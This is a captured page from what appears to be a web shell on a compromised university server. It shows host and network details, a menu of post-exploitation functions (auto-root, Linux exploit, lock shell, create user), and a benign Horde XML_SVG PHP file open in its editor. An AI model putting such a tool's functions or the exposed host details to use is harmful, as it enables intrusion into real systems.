Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
lib /
php /
XML /
SVG /
[ HOME SHELL ]
Name
Size
Permission
Action
Animate.php
1.31
KB
-rw-r--r--
Circle.php
950
B
-rw-r--r--
Defs.php
568
B
-rw-r--r--
Desc.php
585
B
-rw-r--r--
Document.php
897
B
-rw-r--r--
Element.php
2.99
KB
-rw-r--r--
Ellipse.php
1018
B
-rw-r--r--
FilterMergeNode.php
532
B
-rw-r--r--
Filter.php
847
B
-rw-r--r--
FilterPrimitive.php
2.48
KB
-rw-r--r--
Fragment.php
943
B
-rw-r--r--
Group.php
580
B
-rw-r--r--
Image.php
1.14
KB
-rw-r--r--
Line.php
992
B
-rw-r--r--
Marker.php
1.28
KB
-rw-r--r--
Path.php
845
B
-rw-r--r--
Polygon.php
885
B
-rw-r--r--
Polyline.php
887
B
-rw-r--r--
RadialGradient.php
614
B
-rw-r--r--
Rect.php
1.06
KB
-rw-r--r--
Stop.php
594
B
-rw-r--r--
Textpath.php
1.14
KB
-rw-r--r--
Text.php
581
B
-rw-r--r--
Title.php
613
B
-rw-r--r--
Tref.php
793
B
-rw-r--r--
Tspan.php
995
B
-rw-r--r--
Use.php
632
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : FilterPrimitive.php
<?php /** * Package for building SVG graphics. * * Copyright 2002-2007 The Horde Project (http://www.horde.org/) * * @author Chuck Hagenbuch <chuck@horde.org> * @package XML_SVG * @license http://www.fsf.org/copyleft/lgpl.html */ require_once 'XML/SVG/Element.php'; /** * XML_SVG_FilterPrimitive * * @package XML_SVG */ class XML_SVG_FilterPrimitive extends XML_SVG_Element { var $_primitives = array('Blend', 'ColorMatrix', 'ComponentTransfer', 'Composite', 'ConvolveMatrix', 'DiffuseLighting', 'DisplacementMap', 'Flood', 'GaussianBlur', 'Image', 'Merge', 'Morphology', 'Offset', 'SpecularLighting', 'Tile', 'Turbulence'); var $_primitive; var $_in; var $_in2; var $_result; var $_x; var $_y; var $_dx; var $_dy; var $_width; var $_height; var $_mode; var $_type; var $_values; var $_operator; var $_k1; var $_k2; var $_k3; var $_k4; var $_surfaceScale; var $_diffuseConstant; var $_kernelUnitLength; var $_floor_color; var $_flood_opacity; function XML_SVG_FilterPrimitive($primitive, $params = array()) { parent::XML_SVG_Element($params); $this->_primitive = $primitive; } function printElement() { $name = 'fe' . $this->_primitive; echo '<' . $name; $this->printParams('id', 'x', 'y', 'dx', 'dy', 'width', 'height', 'in', 'in2', 'result', 'mode', 'type', 'values', 'operator', 'k1', 'k2', 'k3', 'k4', 'surfaceScale', 'stdDeviation', 'diffuseConstant', 'kernelUnitLength', 'flood_color', 'flood_opacity'); if (is_array($this->_elements)) { // Print children, start and end tag. echo ">\n"; parent::printElement(); echo '</' . $name . '>'; } else { echo '/>'; } } /** * For feMerge elements. */ function addMergeNode($in) { $this->addChild(new XML_SVG_FilterMergeNode(array('in' => $in))); } }
Close